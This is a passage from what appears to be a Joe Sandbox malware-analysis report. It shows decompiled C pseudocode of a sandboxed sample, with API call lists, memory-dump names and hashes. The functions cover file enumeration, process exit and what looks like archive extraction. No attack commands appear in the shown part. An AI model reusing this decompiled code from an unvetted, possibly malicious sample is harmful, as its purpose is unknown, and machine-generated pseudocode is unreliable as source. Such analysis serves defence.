						 *(_t80 + 0x1040) =  *(_t80 + 0x1040) & 0x00000000;
						return _t81;
					}
					_t81 = _t79;
					_t61 = GetLastError();
					__eflags = _t61 - 0x12;
					_t62 = _t61 & 0xffffff00 | _t61 != 0x00000012;
					L9:
					_t80 = _a12;
					 *(_t80 + 0x1044) = _t62;
					goto L13;
				}
				_t63 = FindFirstFileW(_a8, ??); // executed
				_t81 = _t63;
				if(_t81 != _t79) {
					goto L12;
				}
				if(E00B6BB03(_a8,  &_v4692, 0x800) == 0) {
					L4:
					_t66 = GetLastError();
					if(_t66 == 2 || _t66 == 3 || _t66 == 0x12) {
						_t62 = 0;
						__eflags = 0;
					} else {
						_t62 = 1;
					}
					goto L9;
				}
				_t69 = FindFirstFileW( &_v4692,  &_v596); // executed
				_t81 = _t69;
				if(_t81 != _t79) {
					goto L12;
				}
				goto L4;
			}

0x00b6a6a3
0x00b6a6aa
0x00b6a6b4
0x00b6a6bc
0x00b6a6bf
0x00b6a728
0x00b6a72e
0x00b6a730
0x00b6a742
0x00b6a742
0x00b6a74a
0x00b6a74f
0x00b6a758
0x00b6a765
0x00b6a765
0x00b6a76b
0x00b6a777
0x00b6a77a
0x00b6a786
0x00b6a792
0x00b6a79e
0x00b6a7aa
0x00b6a7b6
0x00b6a7c2
0x00b6a7ce
0x00b6a7db
0x00b6a7ed
0x00b6a7ff
0x00b6a804
0x00b6a804
0x00b6a811
0x00b6a811
0x00b6a732
0x00b6a734
0x00b6a73a
0x00b6a73d
0x00b6a719
0x00b6a719
0x00b6a71c
0x00000000
0x00b6a71c
0x00b6a6c4
0x00b6a6ca
0x00b6a6ce
0x00000000
0x00000000
0x00b6a6e2
0x00b6a6fe
0x00b6a6fe
0x00b6a707
0x00b6a717
0x00b6a717
0x00b6a713
0x00b6a713
0x00b6a713
0x00000000
0x00b6a707
0x00b6a6f2
0x00b6a6f8
0x00b6a6fc
0x00000000
0x00000000
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B6A592,000000FF,?,?), ref: 00B6A6C4

Part of subcall function 00B6BB03: _wcslen.LIBCMT ref: 00B6BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B6A592,000000FF,?,?), ref: 00B6A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B6A592,000000FF,?,?), ref: 00B6A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00B6A592,000000FF,?,?), ref: 00B6A728
GetLastError.KERNEL32(?,?,?,?,00B6A592,000000FF,?,?), ref: 00B6A734

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 6f3cabf3e809340a15a7c5963ff8414dc9f8932eccd327ede427b23b7e67fe5e
Instruction ID: 7afcef64f4e3a5e4c021ca0dbf02ac52309a1603565dd0221707f1d307ed5d41
Opcode Fuzzy Hash: 6f3cabf3e809340a15a7c5963ff8414dc9f8932eccd327ede427b23b7e67fe5e
Instruction Fuzzy Hash: 6B414D72900515ABCB25DF68CC84AEAB7F8FB48350F1442D6E56DE3240D738AE94CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B87DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B87DEE(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;

				if(E00B8B076(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00B87E73(_t15, _a4);
				ExitProcess(_a4);
			}

0x00b87dfa
0x00b87e16
0x00b87e16
0x00b87e1f
0x00b87e28

APIs

GetCurrentProcess.KERNEL32(?,?,00B87DC4,?,00B9C300,0000000C,00B87F1B,?,00000002,00000000), ref: 00B87E0F
TerminateProcess.KERNEL32(00000000,?,00B87DC4,?,00B9C300,0000000C,00B87F1B,?,00000002,00000000), ref: 00B87E16
ExitProcess.KERNEL32 ref: 00B87E28

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4e5f83b495ce6b2004360f4e48c8504f233302323f69d30a90dc11a69ef94bef
Instruction ID: ccc1f44f7e429be41f3eaf89256f9ce2b4565d9569770e231753a12b6f09b35e
Opcode Fuzzy Hash: 4e5f83b495ce6b2004360f4e48c8504f233302323f69d30a90dc11a69ef94bef
Instruction Fuzzy Hash: 4AE0B631054148EBCF117F64DE0AA4A7FEAEB50786B104495F8199B132CF36DE52CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00B6848E Relevance: 2.5, APIs: 1, Instructions: 960
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00B6848E(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t383;
				signed int _t387;
				signed int _t392;
				signed int _t398;
				void* _t400;
				signed int _t401;
				signed int _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t411;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t442;
				signed int _t445;
				signed int _t446;
				char _t448;
				signed int _t449;
				signed int _t450;
				signed int _t473;
				signed int _t482;
				intOrPtr _t485;
				signed int _t495;
				char _t500;
				char _t501;
				void* _t508;
				void* _t515;
				void* _t517;
				signed int _t525;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t534;
				signed int _t536;
				signed int _t543;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t558;
				signed char _t559;
				signed int _t562;
				void* _t567;
				signed int _t573;
				intOrPtr* _t582;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t596;
				intOrPtr _t599;
				signed int _t602;
				signed int _t611;
				signed int _t613;
				signed int _t616;
				signed int _t619;
				signed int _t621;
				signed int _t622;
				signed int _t624;
				signed int _t625;
				signed int _t628;
				void* _t637;
				intOrPtr _t645;
				char _t646;
				signed int _t649;
				signed int _t650;
				void* _t657;
				void* _t658;
				signed int _t675;
				intOrPtr _t686;
				void* _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t692;
				signed int _t695;
				intOrPtr _t697;
				signed int _t702;
				signed int _t704;
				signed int _t707;
				void* _t712;
				signed int _t713;
				signed int _t716;
				signed int _t717;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t725;

				E00B7EB78(0xb92858, _t721);
				E00B7EC50(0x60ac);
				_t582 =  *((intOrPtr*)(_t721 + 8));
				_t684 = 0;
				_t697 = __ecx;
				 *((intOrPtr*)(_t721 - 0x1c)) = __ecx;
				_t585 =  *( *((intOrPtr*)(__ecx + 8)) + 0x92fa) & 0x0000ffff;
				 *(_t721 - 0x18) = _t585;
				if( *((intOrPtr*)(_t721 + 0xc)) != 0) {
					_t704 = __ecx + 0x10;
					 *(_t721 - 0x20) = _t704;
					L5:
					_t383 =  *((intOrPtr*)(_t582 + 0x21f4));
					if(_t383 == 2) {
						 *(_t697 + 0x10ff) = _t684;
						__eflags =  *(_t582 + 0x32f4) - _t684;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t582 + 0x32fc) - _t684;
							if(__eflags > 0) {
								L26:
								_t586 =  *(_t697 + 8);
								__eflags =  *((intOrPtr*)(_t586 + 0x7164)) - _t684;
								if( *((intOrPtr*)(_t586 + 0x7164)) != _t684) {
									L29:
									 *(_t721 - 0x13) = _t684;
									_t37 = _t721 - 0x60b8; // -22712
									_t38 = _t721 - 0x13; // 0x7ed
									_t387 = E00B65D1A(_t582 + 0x2298, _t38, 6, _t684, _t37, 0x800);
									__eflags = _t387;
									 *(_t721 - 0x11) = _t387 != 0;
									__eflags = _t387;
									if(_t387 != 0) {
										__eflags =  *(_t721 - 0x13);
										if( *(_t721 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t697 + 0xf9)) = 0;
										}
									}
									E00B62112(_t582);
									_push(0x800);
									_t43 = _t721 - 0x30b8; // -10424
									_push(_t582 + 0x22c0);
									E00B6B76C(_t582);
									__eflags =  *((char*)(_t582 + 0x338b));
									 *(_t721 - 0x24) = 1;
									if( *((char*)(_t582 + 0x338b)) == 0) {
										_t392 = E00B62209(_t582);
										__eflags = _t392;
										if(_t392 == 0) {
											_t559 =  *(_t697 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t559 + 0x82c4));
											asm("sbb al, al");
											_t61 = _t721 - 0x11;
											 *_t61 =  *(_t721 - 0x11) &  !_t559;
											__eflags =  *_t61;
										}
									} else {
										_t562 =  *( *(_t697 + 8) + 0x82c4);
										__eflags = _t562 - 1;
										if(_t562 != 1) {
											__eflags =  *(_t721 - 0x13);
											if( *(_t721 - 0x13) == 0) {
												__eflags = _t562;
												 *(_t721 - 0x11) =  *(_t721 - 0x11) & (_t562 & 0xffffff00 | _t562 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t721 - 0x30b8; // -10424
												_t567 = E00B6C249(_t54);
												_t675 =  *(_t697 + 8);
												__eflags =  *((intOrPtr*)(_t675 + 0x82c4)) - 1 - _t567;
												if( *((intOrPtr*)(_t675 + 0x82c4)) - 1 != _t567) {
													 *(_t721 - 0x11) = 0;
												} else {
													_t57 = _t721 - 0x30b8; // -10424
													_push(1);
													E00B6C249(_t57);
												}
											}
										}
									}
									 *((char*)(_t697 + 0x67)) =  *((intOrPtr*)(_t582 + 0x3331));
									 *((char*)(_t697 + 0x68)) = 0;
									asm("sbb eax, [ebx+0x32f4]");
									 *0xb93278( *((intOrPtr*)(_t582 + 0x6cc0)) -  *(_t582 + 0x32f0),  *((intOrPtr*)(_t582 + 0x6cc4)), 0);
									 *((intOrPtr*)( *_t582 + 0x10))();
									_t685 = 0;
									_t398 = 0;
									_t595 = 0;
									 *(_t721 - 0xd) = 0;
									 *(_t721 - 0x28) = 0;
									__eflags =  *(_t582 + 0x3333);
									if( *(_t582 + 0x3333) == 0) {
										L44:
										__eflags =  *(_t721 - 0x11) - _t595;
										if( *(_t721 - 0x11) != _t595) {
											L47:
											_t707 =  *(_t721 - 0x18);
											_t596 =  *((intOrPtr*)( *(_t697 + 8) + 0x7201));
											_t400 = 0x49;
											__eflags = _t596;
											if(_t596 == 0) {
												L49:
												_t401 = _t685;
												L50:
												__eflags = _t596;
												_t88 = _t721 - 0x30b8; // -10424
												_t405 = L00B71B7F(_t596, _t88, (_t401 & 0xffffff00 | _t596 == 0x00000000) & 0x000000ff, _t401,  *(_t721 - 0x28)); // executed
												__eflags = _t405;
												if(__eflags == 0) {
													L14:
													_t406 = 0;
													__eflags = 0;
													L15:
													 *[fs:0x0] =  *((intOrPtr*)(_t721 - 0xc));
													return _t406;
												}
												_push(0x800);
												_t407 = _t697 + 0x1100;
												_push(_t407);
												 *((intOrPtr*)(_t721 - 0x38)) = _t407;
												_t91 = _t721 - 0x30b8; // -10424
												_push(_t582);
												E00B68167(__eflags);
												__eflags =  *(_t721 - 0xd);
												if( *(_t721 - 0xd) != 0) {
													L54:
													 *(_t721 - 0xe) = 0;
													L55:
													_t411 =  *(_t697 + 8);
													_t599 = 0x45;
													__eflags =  *((char*)(_t411 + 0x715b));
													_t686 = 0x58;
													 *((intOrPtr*)(_t721 - 0x34)) = _t599;
													 *((intOrPtr*)(_t721 - 0x30)) = _t686;
													if( *((char*)(_t411 + 0x715b)) != 0) {
														L57:
														__eflags = _t707 - _t599;
														if(_t707 == _t599) {
															L59:
															_t102 = _t721 - 0x20b8; // -6328
															E00B66EDB(_t102);
															_push(0);
															_t103 = _t721 - 0x20b8; // -6328
															_t416 = E00B6A56D(_t102, __eflags, _t697 + 0x1100, _t103);
															__eflags = _t416;
															if(_t416 == 0) {
																_t417 =  *(_t697 + 8);
																__eflags =  *((char*)(_t417 + 0x715b));
																_t114 = _t721 - 0xe;
																 *_t114 =  *(_t721 - 0xe) & (_t417 & 0xffffff00 |  *((char*)(_t417 + 0x715b)) != 0x00000000) - 0x00000001;
																__eflags =  *_t114;
																L65:
																_t116 = _t721 - 0x30b8; // -10424
																_t421 = E00B67C0D(_t582, _t116);
																__eflags = _t421;
																if(_t421 != 0) {
																	while(1) {
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			goto L69;
																		}
																		_t121 = _t721 - 0x30b8; // -10424
																		_t552 = E00B68117(_t697, _t582, _t121);
																		__eflags = _t552;
																		if(_t552 == 0) {
																			 *((char*)(_t697 + 0x2100)) = 1;
																			goto L14;
																		}
																		L69:
																		_t123 = _t721 - 0x1174; // -2420
																		_t602 = 0x40;
																		memcpy(_t123,  *(_t697 + 8) + 0x6024, _t602 << 2);
																		_t725 = _t723 + 0xc;
																		asm("movsw");
																		_t125 = _t721 - 0x2c; // 0x7d4
																		 *(_t721 - 4) = 0;
																		asm("sbb ecx, ecx");
																		_t132 = _t721 - 0x1174; // -2420
																		E00B6D051( *(_t721 - 0x20), 0,  *((intOrPtr*)(_t582 + 0x3334)), _t132,  ~( *(_t582 + 0x3338) & 0x000000ff) & _t582 + 0x00003339, _t582 + 0x3349,  *((intOrPtr*)(_t582 + 0x3384)), _t582 + 0x3363, _t125);
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			L77:
																			_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																			L78:
																			 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																			_t153 = _t721 - 0x1174; // -2420
																			L00B6F204(_t153);
																			_t154 = _t721 - 0x1070; // -2160
																			E00B69556(_t154);
																			_t611 =  *(_t582 + 0x3398);
																			_t431 = 1;
																			 *(_t721 - 0x20) = _t611;
																			 *(_t721 - 4) = 1;
																			_t688 = 0x50;
																			__eflags = _t611;
																			if(_t611 == 0) {
																				L88:
																				_t432 = E00B62209(_t582);
																				__eflags = _t432;
																				if(_t432 == 0) {
																					_t613 =  *(_t721 - 0xe);
																					__eflags = _t613;
																					if(_t613 == 0) {
																						L98:
																						_t431 = 1;
																						__eflags = 1;
																						L99:
																						__eflags =  *(_t582 + 0x6ccc);
																						if(__eflags == 0) {
																							__eflags = _t613;
																							if(_t613 == 0) {
																								L218:
																								 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																								_t368 = _t721 - 0x1070; // -2160
																								_t398 = E00B6959A(_t368);
																								__eflags =  *(_t721 - 0x11);
																								_t595 =  *(_t721 - 0xe);
																								_t689 =  *(_t721 - 0xd);
																								if( *(_t721 - 0x11) != 0) {
																									_t372 = _t697 + 0xf4;
																									 *_t372 =  *(_t697 + 0xf4) + 1;
																									__eflags =  *_t372;
																								}
																								L220:
																								__eflags =  *((char*)(_t697 + 0x68));
																								if( *((char*)(_t697 + 0x68)) != 0) {
																									goto L14;
																								}
																								__eflags = _t595;
																								if(_t595 != 0) {
																									L17:
																									_t406 = 1;
																									goto L15;
																								}
																								__eflags =  *(_t582 + 0x6ccc) - _t595;
																								if( *(_t582 + 0x6ccc) == _t595) {
																									L9:
																									E00B61F47(_t582);
																									goto L17;
																								}
																								__eflags = _t689;
																								_t406 = _t398 & 0xffffff00 | _t689 != 0x00000000;
																								goto L15;
																							}
																							L104:
																							_t616 =  *(_t721 - 0x18);
																							L105:
																							_t435 =  *(_t697 + 8);
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) == 0) {
																								L107:
																								_t436 =  *(_t721 - 0xd);
																								__eflags = _t436;
																								if(_t436 != 0) {
																									L112:
																									 *((char*)(_t721 - 0x12)) = 1;
																									__eflags = _t436;
																									if(_t436 != 0) {
																										L114:
																										 *((intOrPtr*)(_t697 + 0xf0)) =  *((intOrPtr*)(_t697 + 0xf0)) + 1;
																										 *((intOrPtr*)(_t697 + 0x80)) = 0;
																										 *((intOrPtr*)(_t697 + 0x84)) = 0;
																										 *((intOrPtr*)(_t697 + 0x88)) = 0;
																										 *((intOrPtr*)(_t697 + 0x8c)) = 0;
																										E00B6AB1A(_t697 + 0xd0, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
																										E00B6AB1A(_t697 + 0xa8, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
																										_t442 =  *(_t582 + 0x32f0);
																										_t712 = _t697 + 0x10;
																										_t619 =  *(_t582 + 0x32f4);
																										 *(_t697 + 0x38) = _t442;
																										 *(_t697 + 0x30) = _t442;
																										_t222 = _t721 - 0x1070; // -2160
																										 *(_t697 + 0x3c) = _t619;
																										 *(_t697 + 0x34) = _t619;
																										E00B6D099(_t712, _t582, _t222);
																										_t621 =  *((intOrPtr*)(_t721 - 0x12));
																										_t690 = 0;
																										_t445 =  *(_t721 - 0xd);
																										 *((char*)(_t697 + 0x41)) = _t621;
																										 *((char*)(_t697 + 0x42)) = _t445;
																										 *(_t721 - 0x28) = 0;
																										 *(_t721 - 0x24) = 0;
																										__eflags = _t621;
																										if(_t621 != 0) {
																											L132:
																											_t622 =  *(_t697 + 8);
																											__eflags =  *((char*)(_t622 + 0x71a0));
																											 *((char*)(_t721 - 0x1053)) =  *((char*)(_t622 + 0x71a0)) == 0;
																											__eflags =  *((char*)(_t721 - 0x12));
																											if( *((char*)(_t721 - 0x12)) != 0) {
																												L136:
																												_t446 = _t690;
																												 *((char*)(_t721 - 0x10)) = _t690;
																												L137:
																												__eflags =  *(_t721 - 0x20);
																												 *((char*)(_t721 - 0x14)) = 1;
																												 *((char*)(_t721 - 0xf)) = 1;
																												if( *(_t721 - 0x20) == 0) {
																													__eflags =  *(_t582 + 0x3330);
																													if( *(_t582 + 0x3330) == 0) {
																														__eflags =  *((char*)(_t582 + 0x22b8));
																														if(__eflags != 0) {
																															_push( *(_t582 + 0x3388) & 0x000000ff);
																															_push( *((intOrPtr*)(_t582 + 0x338c)));
																															E00B73377(_t582,  *((intOrPtr*)(_t697 + 0xe8)));
																															_t485 =  *((intOrPtr*)(_t697 + 0xe8));
																															 *(_t485 + 0x4c48) =  *(_t582 + 0x32f8);
																															__eflags = 0;
																															 *(_t485 + 0x4c4c) =  *(_t582 + 0x32fc);
																															 *((char*)(_t485 + 0x4c60)) = 0;
																															E00B73020( *((intOrPtr*)(_t697 + 0xe8)),  *((intOrPtr*)(_t582 + 0x22b4)),  *(_t582 + 0x3388) & 0x000000ff); // executed
																														} else {
																															_push( *(_t582 + 0x32fc));
																															_push( *(_t582 + 0x32f8));
																															_push(_t712);
																															E00B69215(_t582, _t697, __eflags);
																														}
																													}
																													L169:
																													E00B61F47(_t582);
																													__eflags =  *((char*)(_t582 + 0x3331));
																													if( *((char*)(_t582 + 0x3331)) != 0) {
																														L172:
																														_t448 = 0;
																														__eflags = 0;
																														_t624 = 0;
																														L173:
																														__eflags =  *(_t582 + 0x3388);
																														if( *(_t582 + 0x3388) != 0) {
																															__eflags =  *((char*)(_t582 + 0x22b8));
																															if( *((char*)(_t582 + 0x22b8)) == 0) {
																																L181:
																																__eflags =  *(_t721 - 0xd);
																																 *((char*)(_t721 - 0x10)) = _t448;
																																if( *(_t721 - 0xd) != 0) {
																																	L191:
																																	__eflags =  *(_t721 - 0x20);
																																	_t691 =  *((intOrPtr*)(_t721 - 0xf));
																																	if( *(_t721 - 0x20) == 0) {
																																		L195:
																																		_t625 = 0;
																																		__eflags = 0;
																																		L196:
																																		__eflags =  *((char*)(_t721 - 0x12));
																																		if( *((char*)(_t721 - 0x12)) != 0) {
																																			goto L218;
																																		}
																																		_t713 =  *(_t721 - 0x18);
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x30));
																																		if(_t713 ==  *((intOrPtr*)(_t721 - 0x30))) {
																																			L199:
																																			__eflags =  *(_t721 - 0x20);
																																			if( *(_t721 - 0x20) == 0) {
																																				L203:
																																				__eflags = _t448;
																																				if(_t448 == 0) {
																																					L206:
																																					__eflags = _t625;
																																					if(_t625 != 0) {
																																						L214:
																																						_t449 =  *(_t697 + 8);
																																						__eflags =  *((char*)(_t449 + 0x71a8));
																																						if( *((char*)(_t449 + 0x71a8)) == 0) {
																																							_t714 = _t697 + 0x1100;
																																							_t450 = E00B6A4ED(_t697 + 0x1100,  *((intOrPtr*)(_t582 + 0x22bc))); // executed
																																							__eflags = _t450;
																																							if(__eflags == 0) {
																																								E00B62021(__eflags, 0x11, _t582 + 0x32, _t714);
																																								E00B66DCB(0xba1098, __eflags);
																																							}
																																						}
																																						 *(_t697 + 0x10ff) = 1;
																																						goto L218;
																																					}
																																					_t692 =  *(_t721 - 0x24);
																																					__eflags = _t692;
																																					_t628 =  *(_t721 - 0x28);
																																					if(_t692 > 0) {
																																						L209:
																																						__eflags = _t448;
																																						if(_t448 != 0) {
																																							L212:
																																							_t341 = _t721 - 0x1070; // -2160
																																							E00B69F09(_t341);
																																							L213:
																																							_t702 = _t582 + 0x32d8;
																																							asm("sbb eax, eax");
																																							asm("sbb ecx, ecx");
																																							asm("sbb eax, eax");
																																							_t349 = _t721 - 0x1070; // -2160
																																							E00B69DA2(_t349, _t582 + 0x32e8,  ~( *( *(_t697 + 8) + 0x82d0)) & _t702,  ~( *( *(_t697 + 8) + 0x82d4)) & _t582 + 0x000032e0,  ~( *( *(_t697 + 8) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t350 = _t721 - 0x1070; // -2160
																																							E00B69620(_t350);
																																							E00B67A78( *((intOrPtr*)(_t721 - 0x1c)),  *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)), _t582,  *((intOrPtr*)(_t721 - 0x38)));
																																							asm("sbb eax, eax");
																																							asm("sbb eax, eax");
																																							__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702;
																																							E00B69D9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																																							goto L214;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x88)) - _t628;
																																						if( *((intOrPtr*)(_t697 + 0x88)) != _t628) {
																																							goto L212;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x8c)) - _t692;
																																						if( *((intOrPtr*)(_t697 + 0x8c)) == _t692) {
																																							goto L213;
																																						}
																																						goto L212;
																																					}
																																					__eflags = _t628;
																																					if(_t628 == 0) {
																																						goto L213;
																																					}
																																					goto L209;
																																				}
																																				_t473 =  *(_t697 + 8);
																																				__eflags =  *((char*)(_t473 + 0x71a0));
																																				if( *((char*)(_t473 + 0x71a0)) == 0) {
																																					goto L218;
																																				}
																																				_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																				goto L206;
																																			}
																																			__eflags = _t625;
																																			if(_t625 != 0) {
																																				goto L203;
																																			}
																																			__eflags =  *(_t582 + 0x3398) - 5;
																																			if( *(_t582 + 0x3398) != 5) {
																																				goto L218;
																																			}
																																			__eflags = _t691;
																																			if(_t691 == 0) {
																																				goto L218;
																																			}
																																			goto L203;
																																		}
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x34));
																																		if(_t713 !=  *((intOrPtr*)(_t721 - 0x34))) {
																																			goto L218;
																																		}
																																		goto L199;
																																	}
																																	__eflags =  *(_t582 + 0x3398) - 4;
																																	if( *(_t582 + 0x3398) != 4) {
																																		goto L195;
																																	}
																																	__eflags = _t691;
																																	if(_t691 == 0) {
																																		goto L195;
																																	}
																																	_t625 = 1;
																																	goto L196;
																																}
																																__eflags =  *((char*)(_t721 - 0x14));
																																if( *((char*)(_t721 - 0x14)) == 0) {
																																	goto L191;
																																}
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	goto L191;
																																}
																																__eflags =  *(_t582 + 0x3333) - _t624;
																																if(__eflags == 0) {
																																	L189:
																																	_push(3);
																																	L190:
																																	_pop(_t637);
																																	_t321 = _t721 - 0x30b8; // -10424
																																	E00B62021(__eflags, _t637, _t582 + 0x32, _t321);
																																	 *((char*)(_t721 - 0x10)) = 1;
																																	E00B66D83(0xba1098, 3);
																																	_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																	goto L191;
																																}
																																__eflags =  *((intOrPtr*)(_t582 + 0x3359)) - _t624;
																																if( *((intOrPtr*)(_t582 + 0x3359)) == _t624) {
																																	L187:
																																	__eflags =  *((char*)(_t697 + 0xfc));
																																	if(__eflags != 0) {
																																		goto L189;
																																	}
																																	_push(4);
																																	goto L190;
																																}
																																__eflags =  *(_t582 + 0x6cdc) - _t624;
																																if(__eflags == 0) {
																																	goto L189;
																																}
																																goto L187;
																															}
																															__eflags =  *(_t582 + 0x32fc) - _t448;
																															if(__eflags < 0) {
																																goto L181;
																															}
																															if(__eflags > 0) {
																																L179:
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	 *((char*)(_t697 + 0xfc)) = 1;
																																}
																																goto L181;
																															}
																															__eflags =  *(_t582 + 0x32f8) - _t448;
																															if( *(_t582 + 0x32f8) <= _t448) {
																																goto L181;
																															}
																															goto L179;
																														}
																														 *((char*)(_t697 + 0xfc)) = _t448;
																														goto L181;
																													}
																													asm("sbb eax, eax");
																													_t482 = E00B6AAEA(_t582, _t697 + 0xd0, _t582 + 0x3308,  ~( *(_t582 + 0x3362) & 0x000000ff) & _t582 + 0x00003363);
																													__eflags = _t482;
																													if(_t482 == 0) {
																														goto L172;
																													}
																													_t624 = 1;
																													_t448 = 0;
																													goto L173;
																												}
																												_t716 =  *(_t582 + 0x3398);
																												__eflags = _t716 - 4;
																												if(_t716 == 4) {
																													L151:
																													_push(0x800);
																													_t270 = _t721 - 0x50b8; // -18616
																													_push(_t582 + 0x339c);
																													E00B6B76C(_t582);
																													_push(0x800);
																													_t272 = _t721 - 0x40b8; // -14520
																													_t645 = _t697;
																													_t273 = _t721 - 0x50b8; // -18616
																													_push(_t582);
																													E00B68167(__eflags);
																													_t446 =  *((intOrPtr*)(_t721 - 0x10));
																													__eflags = _t446;
																													if(_t446 == 0) {
																														L159:
																														_t646 =  *((intOrPtr*)(_t721 - 0xf));
																														L160:
																														__eflags =  *((intOrPtr*)(_t582 + 0x6cc8)) - 2;
																														if( *((intOrPtr*)(_t582 + 0x6cc8)) != 2) {
																															L146:
																															__eflags = _t446;
																															if(_t446 == 0) {
																																L163:
																																_t495 = 0;
																																__eflags = 0;
																																L164:
																																 *(_t697 + 0x10ff) = _t495;
																																goto L169;
																															}
																															L147:
																															__eflags = _t646;
																															if(_t646 == 0) {
																																goto L163;
																															}
																															_t495 = 1;
																															goto L164;
																														}
																														__eflags = _t446;
																														if(_t446 != 0) {
																															goto L147;
																														}
																														L145:
																														 *((char*)(_t721 - 0x14)) = 0;
																														goto L146;
																													}
																													__eflags =  *((short*)(_t721 - 0x40b8));
																													if( *((short*)(_t721 - 0x40b8)) == 0) {
																														goto L159;
																													}
																													_t276 = _t721 - 0x40b8; // -14520
																													_push(0x800);
																													_push(_t697 + 0x1100);
																													__eflags = _t716 - 4;
																													if(__eflags != 0) {
																														_push(_t582 + 0x32);
																														_t281 = _t721 - 0x1070; // -2160
																														_t500 = E00B69155(_t690, _t697, _t716, __eflags);
																														_t646 = _t500;
																														 *((char*)(_t721 - 0xf)) = _t500;
																														L157:
																														__eflags = _t646;
																														if(_t646 == 0) {
																															L144:
																															_t446 =  *((intOrPtr*)(_t721 - 0x10));
																															goto L145;
																														}
																														_t446 =  *((intOrPtr*)(_t721 - 0x10));
																														goto L160;
																													}
																													_push( *(_t697 + 8));
																													_t501 = E00B67542(_t645, _t697, __eflags);
																													L155:
																													_t646 = _t501;
																													 *((char*)(_t721 - 0xf)) = _t646;
																													goto L157;
																												}
